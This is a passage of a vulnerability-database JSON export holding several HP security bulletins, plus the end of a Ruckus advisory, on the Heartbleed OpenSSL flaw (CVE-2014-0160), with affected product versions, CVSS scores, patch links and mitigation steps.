http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-04-20T00:00:00", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04307186\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04307186\r\nVersion: 1\r\n\r\nHPSBMU03044 rev.1 - HP Business Process Monitor, running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-21\r\nLast Updated: 2014-05-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Business\r\nProcess Monitor running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101580\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Business Process Monitor 9.23, 9.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve this\r\nvulnerability:\r\n\r\nBusiness Process Monitor 9.23, download LoadRunner 11.52, patch 2:\r\n\r\nLoad Generator SA for Windows:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LRLG_00051\r\n\r\nLoad Generator SA for Linux:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LR_03304\r\n\r\nBusiness Process Monitor 9.24, download LoadRunner 12.00, patch 1:\r\n\r\nLoad Generator SA for Windows:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LRLG_00052\r\n\r\nLoad Generator SA for Linux:\r\nhttp://support.openview.hp.com/selfsolve/document/LID/LR_03333\r\n\r\nHP recommends following our security guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nNOTE: Bulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html.\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEUEARECAAYFAlN81JsACgkQ4B86/C0qfVmU2ACYuoE51YpIHWq6Im2lk4QYgF01\r\nwACgkyjDWjnA1zMlCEl4NElDV/x+cRs=\r\n=/tyK\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-30T00:00:00", "title": "[security bulletin] HPSBMU03044 rev.1 - HP Business Process Monitor, running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:52", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-30T00:00:00", "id": "SECURITYVULNS:DOC:30776", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30776", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04255796\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04255796\r\nVersion: 1\r\n\r\nHPSBMU03012 rev.1 - HP Insight Management VCEM Web Client SDK (VCEMSDK)\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-18\r\nLast Updated: 2014-04-18\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nManagement VCEM Web Client SDK (VCEMSDK) running OpenSSL.This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101504\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Management VCEM Web Client SDK (VCEMSDK) 7.2, 7.2.2, and 7.3\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Management VCEM Web Client SDK (VCEMSDK). This\r\nbulletin will be revised when the software updates are released.\r\n\r\nUntil the software updates are available, HP recommends limiting programs\r\nlinked with HP VCEMSDK to use on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 18 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNRP1wACgkQ4B86/C0qfVkaewCg7+4MmkcbuOhazNXgl7B9p7MX\r\nanMAnAgqdtY/rGMoT4p5f5baCZNPdlCk\r\n=ib+P\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03012 rev.1 - HP Insight Management VCEM Web Client SDK (VCEMSDK) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30511", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30511", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101529)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 (including all patches) HP Cloud System Chargeback 9.40\r\n(including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWbHwACgkQ4B86/C0qfVl2AgCg+g9OYkOXmavhzO8oNrQAqZEC\r\ngnkAoJ7e9mgEcg6wSdzVzykAsNISIB7E\r\n=v1pz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04264595\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04264595\r\nVersion: 1\r\n\r\nHPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-01\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP IBRIX X9320\r\nStorage running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101514\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP IBRIX X9320 Storage systems running HP StoreAll OS v6.3.3, v6.5 and v6.5.1\r\nwith these SKUs:\r\n\r\nQP333A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP334A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP335A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP336A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP337A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Starter Kit\r\n\r\nQP338A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Expansion Kit\r\n\r\nQZ722A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Starter Kit\r\n\r\nQZ723A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Expansion Kit\r\n\r\nQZ724A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ725A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nQZ726A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ727A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP IBRIX X9320 Storage. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nUntil the software updates are available, HP recommends restricting\r\nadministrative access to the MSA on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNiyroACgkQ4B86/C0qfVmYEwCgoYdOOiwyP2DpeGeGb40tS0Br\r\njfMAoMLbmVB2pdVa9XAfs92eV2+hhLNu\r\n=ZY1m\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30524", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30524", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260385\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260385\r\nVersion: 1\r\n\r\nHPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with WMI Mapper for HP\r\nSystems Insight Manager running OpenSSL. This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101523\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for WMI Mapper for HP\r\nSystems Insight Manager to resolve the vulnerability.\r\n\r\nWMI Mapper 7.2.3 (to be used for 7.2, 7.2.1 and 7.2.2 upgrades)\r\nWMI Mapper 7.3.2 (to be used for 7.3 and 7.3.1 upgrades)\r\n\r\nThe software updates are available here:\r\n\r\nSoftware Version\r\n Location\r\n\r\nWMI Mapper 7.2.3\r\n http://www.hp.com/swpublishing/MTX-9ef95a0fdf044f7aa5f7a09445\r\n\r\nWMI Mapper 7.3.2\r\n http://www.hp.com/swpublishing/MTX-4503970ccd6841dca639ddbcee\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW4IMACgkQ4B86/C0qfVmF8ACaAvPqjqJ+M0rI8rH+l1chmwY4\r\np/gAoIxRd6xqTFRbjlGtAFTc2jY01H1K\r\n=q4pb\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30506", "href": 